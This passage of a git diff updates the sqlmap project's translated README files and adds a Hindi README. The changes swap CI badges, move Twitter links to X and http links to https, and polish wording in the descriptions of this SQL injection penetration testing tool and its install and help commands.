https://github.com/sqlmapproject/sqlmap/wiki * Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demostraciones: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fa-IR.md b/doc/translations/README-fa-IR.md index 207e46bcdab..e3d9daf604c 100644 --- a/doc/translations/README-fa-IR.md +++ b/doc/translations/README-fa-IR.md 
@@ -1,16 +1,16 @@ # sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap)
-برنامه `sqlmap`، برنامه‌ی منبع باز هست که برای تست نفوذ پذیزی دربرابر حمله‌های احتمالی `sql injection` (جلوگیری از لو رفتن پایگاه داده) جلو گیری می‌کند. این برنامه مجهز به مکانیزیم تشخیص قدرتمندی می‌باشد. همچنین داری طیف گسترده‌ای از اسکریپت ها می‌باشد که برای متخصص تست نفوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق `via out-of-band` درسیستم عامل را امکان پذیر می‌کند. +برنامه `sqlmap`، یک برنامه‌ی تست نفوذ منبع باز است که فرآیند تشخیص و اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام می دهد. این برنامه مجهز به موتور تشخیص قدرتمندی می‌باشد. همچنین داری طیف گسترده‌ای از اسکریپت ها می‌باشد که برای متخصصان تست نفوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر می‌کند. -عکس +تصویر محیط ابزار ---- @@ -23,7 +23,7 @@
-برای دیدن کردن از [مجموعه‌ی از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از ویکی دیدن کنید. +برای نمایش [مجموعه ای از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از دانشنامه دیدن کنید. نصب @@ -32,11 +32,11 @@ برای دانلود اخرین نسخه tarball، با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید. -طرز استفاده +نحوه استفاده ---- -برای گرفتن لیست ارگومان‌های اساسی می‌توانید از دستور زیر استفاده کنید: +برای دریافت لیست ارگومان‌های اساسی می‌توانید از دستور زیر استفاده کنید: @@ -53,7 +53,7 @@
-برای گرفتن لیست تمامی ارگومان‌های می‌توانید از دستور زیر استفاده کنید: +برای دریافت لیست تمامی ارگومان‌ها می‌توانید از دستور زیر استفاده کنید:
@@ -66,7 +66,7 @@
-برای اطلاعات بیشتر برای اجرا از [اینجا](https://asciinema.org/a/46601) می‌توانید استفاده کنید. برای گرفتن اطلاعات بیشتر توسعه می‌شود به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید. +برای اجرای سریع و ساده ابزار می توانید از [اینجا](https://asciinema.org/a/46601) استفاده کنید. برای دریافت اطلاعات بیشتر در رابطه با قابلیت ها ، امکانات قابل پشتیبانی و لیست کامل امکانات و دستورات همراه با مثال می‌ توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید. لینک‌ها @@ -74,11 +74,11 @@ * خانه: https://sqlmap.org -* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* کایمت و نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* پیگری مشکلات: https://github.com/sqlmapproject/sqlmap/issues +* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues * راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki * سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* تویتر: [@sqlmap](https://twitter.com/sqlmap) -* رسانه: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* عکس‌ها: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots +* توییتر: [@sqlmap](https://x.com/sqlmap) +* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fr-FR.md b/doc/translations/README-fr-FR.md index 293262c1c56..964f7e1045a 100644 --- a/doc/translations/README-fr-FR.md +++ b/doc/translations/README-fr-FR.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) **sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation. 
@@ -19,7 +19,7 @@ De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sql git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](http://www.python.org/download/) +sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](https://www.python.org/download/) Utilisation ---- @@ -44,6 +44,6 @@ Liens * Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues * Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki * Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Démonstrations: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md index ccdc4fc4401..ede6340d1ce 100644 --- a/doc/translations/README-gr-GR.md +++ b/doc/translations/README-gr-GR.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων. 
@@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα. +Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](https://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα. Χρήση ---- @@ -45,6 +45,6 @@ * Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues * Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki * Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md index d8815b163de..dffab7062e6 100644 --- a/doc/translations/README-hr-HR.md +++ b/doc/translations/README-hr-HR.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza. 
@@ -20,7 +20,7 @@ Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sql git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. +sqlmap radi bez posebnih zahtjeva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. Korištenje ---- @@ -45,6 +45,6 @@ Poveznice * Prijava problema: https://github.com/sqlmapproject/sqlmap/issues * Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki * Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md index dd52a847687..39ad3e58fb9 100644 --- a/doc/translations/README-id-ID.md +++ b/doc/translations/README-id-ID.md 
@@ -1,50 +1,53 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basis data. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur handal bagi _penetration tester_, beragam cara untuk mendeteksi basis data, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. +sqlmap adalah perangkat lunak sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data. 
+ +sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Perangkat lunak ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. Tangkapan Layar ---- ![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki. +Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki. Instalasi ---- Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master). -Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap): +Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap): git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun. +sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun. Penggunaan ---- -Untuk mendapatkan daftar opsi dasar gunakan: +Untuk mendapatkan daftar opsi dasar gunakan perintah: python sqlmap.py -h -Untuk mendapatkan daftar opsi lanjut gunakan: +Untuk mendapatkan daftar opsi lanjutan gunakan perintah: python sqlmap.py -hh Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601). 
-Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Tautan ---- * Situs: https://sqlmap.org * Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues * Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki -* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos) +* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos) * Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-in-HI.md b/doc/translations/README-in-HI.md new file mode 100644 index 00000000000..c2d323bcc81 --- /dev/null +++ b/doc/translations/README-in-HI.md 
@@ -0,0 +1,50 @@
+# sqlmap ![](https://i.imgur.com/fe85aVR.png)
+
+[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap)
+
+sqlmap एक ओपन सोर्स प्रवेश परीक्षण उपकरण है जो SQL इन्जेक्शन दोषों की पहचान और उपयोग की प्रक्रिया को स्वचलित करता है और डेटाबेस सर्वरों को अधिकृत कर लेता है। इसके साथ एक शक्तिशाली पहचान इंजन, अंतिम प्रवेश परीक्षक के लिए कई निचले विशेषताएँ और डेटाबेस प्रिंट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिस्टम तक पहुँचने और आउट-ऑफ-बैंड कनेक्शन के माध्यम से ऑपरेटिंग सिस्टम पर कमांड चलाने के लिए कई बड़े रेंज के स्विच शामिल हैं।
+
+चित्रसंवाद
+----
+
+![स्क्रीनशॉट](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कुछ फीचर्स की दिखाते हुए छवियों का संग्रह देख सकते हैं।
+
+स्थापना
+----
+
+आप नवीनतम तारबाल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं।
+
+प्राथमिकत: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी क्लोन करके भी डाउनलोड कर सकते हैं:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap [Python](https://www.python.org/download/) संस्करण **2.6**, **2.7** और **3.x** पर किसी भी प्लेटफार्म पर तुरंत काम करता है।
+
+उपयोग
+----
+
+मौलिक विकल्पों और स्विच की सूची प्राप्त करने के लिए:
+
+ python sqlmap.py -h
+
+सभी विकल्पों और स्विच की सूची प्राप्त करने के लिए:
+
+ python sqlmap.py -hh
+
+आप 
[यहां](https://asciinema.org/a/46601) एक नमूना चलाने का पता लगा सकते हैं। sqlmap की क्षमताओं की एक अवलोकन प्राप्त करने, समर्थित फीचर्स की सूची और सभी विकल्पों और स्विच का वर्णन, साथ ही उदाहरणों के साथ, आपको [उपयोगकर्ता मैन्युअल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामर्श दिया जाता है।
+
+लिंक
+----
+
+* मुखपृष्ठ: https://sqlmap.org
+* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* संवाद आरएसएस फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* समस्या ट्रैकर: https://github.com/sqlmapproject/sqlmap/issues
+* उपयोगकर्ता मैन्युअल: https://github.com/sqlmapproject/sqlmap/wiki
+* अक्सर पूछे जाने वाले प्रश्न (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* ट्विटर: [@sqlmap](https://x.com/sqlmap)
+* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* स्क्रीनशॉट: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+*
diff --git a/doc/translations/README-it-IT.md b/doc/translations/README-it-IT.md
index 6e72b169649..af10ee150cc 100644
--- a/doc/translations/README-it-IT.md
+++ b/doc/translations/README-it-IT.md
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band. 
@@ -20,7 +20,7 @@ La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](htt git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](http://www.python.org/download/) su ogni piattaforma. +sqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](https://www.python.org/download/) su ogni piattaforma. Utilizzo ---- @@ -45,6 +45,6 @@ Link * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki * Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Dimostrazioni: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ja-JP.md b/doc/translations/README-ja-JP.md index 2d3fea9b915..3cbc9ce999c 100644 --- a/doc/translations/README-ja-JP.md +++ b/doc/translations/README-ja-JP.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) 